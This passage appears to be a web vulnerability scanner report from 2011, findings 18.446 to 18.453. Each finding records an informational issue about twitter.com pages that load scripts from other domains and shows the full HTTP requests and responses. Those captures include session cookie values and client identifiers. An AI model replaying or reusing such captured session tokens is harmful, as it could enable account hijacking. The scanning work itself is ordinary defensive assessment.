<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...
<![endif]-->
<script src="http://a3.twimg.com/a/1296179758/javascripts/layout_newtwitter.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.446. http://twitter.com/login

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /login

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /login HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:37 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225097-33250-18249
ETag: "6ce45a17fbd5e685f46135465e3d139d"
Last-Modified: Fri, 28 Jan 2011 14:31:37 GMT
X-Runtime: 0.03414
Content-Type: text/html; charset=utf-8
Content-Length: 12714
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlYmUxZmI1Mzc4YmE3MTAzOGM2YmQ4YjYwMTk2YTVl%250AYjY6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--d4c47edb2bb39c8d72c4443a8903065600b0cffd; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...
<![endif]-->
<script src="http://a0.twimg.com/a/1296179758/javascripts/layout_newtwitter.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.447. http://twitter.com/malsup

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /malsup?max_id=30791740717801472&page=2&twttr=true HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:32 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225092-82342-16130
ETag: "c59b4c0b9acbb0f08a369771fe895640"
Last-Modified: Fri, 28 Jan 2011 14:31:32 GMT
X-Runtime: 0.58927
Content-Type: text/html; charset=utf-8
Content-Length: 49556
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIklodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwP21h%250AeF9pZD0zMDc5MTc0MDcxNzgwMTQ3MiZwYWdlPTImdHd0dHI9dHJ1ZToMY3Ny%250AZl9pZCIlMTY0MTM2OGY1Njc4ZTgwNmU1ZTgxMGQ3YzZmMGI5YWY6B2lkIiUx%250AYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0%250AaW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoP%250AY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--dac63748d7ecba0fbd9f79424b096b92afb601f2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.448. http://twitter.com/malsup

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /malsup HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
Referer: http://malsup.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=129452629042599503; k=173.193.214.243.1295994766153789

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:04:16 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296223456-14164-3404
ETag: "369af92da7b575f3f9e1aeeb54e34e15"-gzip
Last-Modified: Fri, 28 Jan 2011 14:04:16 GMT
X-Runtime: 0.01613
Content-Type: text/html; charset=utf-8
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; path=/
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close
Content-Length: 49593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296173346/javascripts/twitter.js?1296176502" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296173346/javascripts/lib/jquery.tipsy.min.js?1296176502" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296173346/javascripts/lib/gears_init.js?1296176502" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296173346/javascripts/lib/mustache.js?1296176502" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296173346/javascripts/geov1.js?1296176502" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296173346/javascripts/api.js?1296176502" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a1.twimg.com/a/1296173346/javascripts/lib/mustache.js?1296176502" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296173346/javascripts/dismissable.js?1296176502" type="text/javascript"></script>
...[SNIP]...

18.449. http://twitter.com/malsup

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /malsup?max_id=30791740717801472&page=2&twttr=true HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:35 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224735-52029-12720
ETag: "aeaf54f4215cc48cd19c989655f24a99"
Last-Modified: Fri, 28 Jan 2011 14:25:35 GMT
X-Runtime: 0.56131
Content-Type: text/html; charset=utf-8
Content-Length: 49556
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIklodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwP21h%250AeF9pZD0zMDc5MTc0MDcxNzgwMTQ3MiZwYWdlPTImdHd0dHI9dHJ1ZToMY3Ny%250AZl9pZCIlNDM5ZDJhZDU1OTViNDQ5ZTA5MDQ2OTZhYWM5NGEwZTE6B2lkIiUx%250AYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0%250AaW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoP%250AY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--acdb87a3f02b633f4834e75acc9f4d30780c1b05; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.450. http://twitter.com/malsup/favorites

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup/favorites

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /malsup/favorites HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:31 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224911-48509-36720
ETag: "aa813f25e26e58a8fc00a80271530b6f"
Last-Modified: Fri, 28 Jan 2011 14:28:31 GMT
X-Runtime: 0.28607
Content-Type: text/html; charset=utf-8
Content-Length: 57347
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlOWM3MDM0NDIyYzY2M2ZkMzM0YWE1NDgwMzg1NWRh%250AM2U6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--316ed1acac7dec68e9460d11f94a8de8f6191911; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.451. http://twitter.com/malsup/favorites

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup/favorites

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /malsup/favorites HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:08:30 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234509-89271-61168
ETag: "217a7482c44a4f0b2f81f2bfc961c91f"
Last-Modified: Fri, 28 Jan 2011 17:08:29 GMT
X-Runtime: 0.58930
Content-Type: text/html; charset=utf-8
Content-Length: 57219
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.452. http://twitter.com/malsup/lists/memberships

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup/lists/memberships

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /malsup/lists/memberships HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:30 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224909-80319-15886
ETag: "c8e3bcf74656418e1966d131ca1712ec"
Last-Modified: Fri, 28 Jan 2011 14:28:29 GMT
X-Runtime: 0.29750
Content-Type: text/html; charset=utf-8
Content-Length: 53194
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlOTY3NDUzZWYzNmZkNjRmZmZhNWVmMDJlMjczNTIz%250AYWI6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d2b7d333c4ae3616cea1972ad8fcfbf90f4504; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.453. http://twitter.com/malsup/lists/memberships

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup/lists/memberships

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /malsup/lists/memberships HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:08:29 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234508-466-13552
ETag: "060db64ad56aead6e4f4004301c48d79"
Last-Modified: Fri, 28 Jan 2011 17:08:28 GMT
X-Runtime: 0.52434
Content-Type: text/html; charset=utf-8
Content-Length: 53061
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
